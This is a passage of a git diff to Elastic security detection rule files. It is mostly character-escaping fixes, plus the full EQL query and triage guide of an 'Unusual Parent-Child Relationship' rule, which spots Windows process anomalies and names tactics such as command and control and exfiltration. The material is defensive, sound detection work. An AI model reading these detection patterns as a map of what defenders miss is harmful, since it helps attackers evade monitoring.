b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json index 2014200b09e..36ea89bd49b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_104.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json index 30a71364d7d..f3f7371838e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_105.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json index 57b1f4f0a6b..c61256ca6d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_106.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json index 62002670112..eb794eaa546 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_107.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json index 529bc0bb14e..6e7473941ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_108.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json index eee1eef7ba0..e8bc0f8c02c 100644 --- a/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json index f9c2c9281ba..57bca3fc572 100644 --- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json index c378b913322..8aedd7526f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json index 4edb3fa4cd2..bed8d321e89 100644 --- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate 